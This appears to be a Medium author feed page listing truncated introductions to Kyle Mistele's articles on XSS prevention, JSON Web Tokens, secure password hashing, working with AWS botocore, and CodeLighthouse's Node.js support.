Image for post
Image for post

If you’re a developer, chances are that you’ve heard of cross-site scripting. Cross-site scripting, commonly known as XSS, is one of the top 10 most common web security vulnerabilities according to OWASP. Cross-site scripting continues to be a major problem in many web applications, and it can result in some serious problems. As a developer, it’s important to know what XSS is and to be aware of it, but it’s even more important to know how to prevent it. Cybersecurity isn’t just for security specialists, it’s for everyone.

Today, I’m going to give you an introduction to XSS. …


Image for post
Image for post

How are you securing your web applications? Are you using session cookies? Third party-based authentication? SAML? Today I’m going to introduce you to a neat standard called JSON Web Tokens, or JWT for short. If you’re worked on web applications, there’s a good chance you’ve at least heard of them, but today I’m going to try to de-mystify them for you.

If you’re interested in getting into all the nitty-gritty details, you can read the RFC, but that’s not the goal of this article. Instead, I’m going to:

  1. Give you a high-level overview of what JWT is
  2. Go a little…


Image for post
Image for post

Are you hashing your user’s passwords? More importantly, are you doing it correctly? There’s a lot of information out there on password hashing, and there are certainly more than a few different hash algorithms available for you to use.

As a full-stack engineer, I’ve spent plenty of time building password-based authentication mechanisms. As an ethical hacker, I’ve spent plenty of time trying to break those mechanisms and crack password hashes.

In this article, I’m going to provide a brief overview of secure password hashing and storage, and then I’m going to show you how to securely hash your passwords for…


Image for post
Image for post

If you’ve ever been unfortunate enough to have had to work with botocore, Amazon Web Services’ Python API, you know that it’s awful. There are dozens of ways to accomplish any given task, and the differences between each are unclear at best. I recently found myself working with botocore while trying to build some S3 functionality into codelighthouse, and I got really frustrated with it, really quickly.

AWS S3 (Simple Storage Service) is not complicated — it’s object storage. You can GET, PUT, DELETE and COPY objects, with a few other functionalities. Simple, right? …


CodeLighthouse launches support for Node.js and Express.js

Image for post
Image for post

Node.js is here, and it’s here to stay — both at CodeLighthouse and in the developer world at large. Node.js has absolutely exploded in terms of popularity since 2009. In general, JavaScript remains extremely popular — the 2020 StackOverflow developer survey ranks JavaScript as the #1 most commonly used language, beating contenders like Python, Java, and PHP:

Kyle Mistele

Co-Founder and CTO @ CodeLighthouse.io, OSCP

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store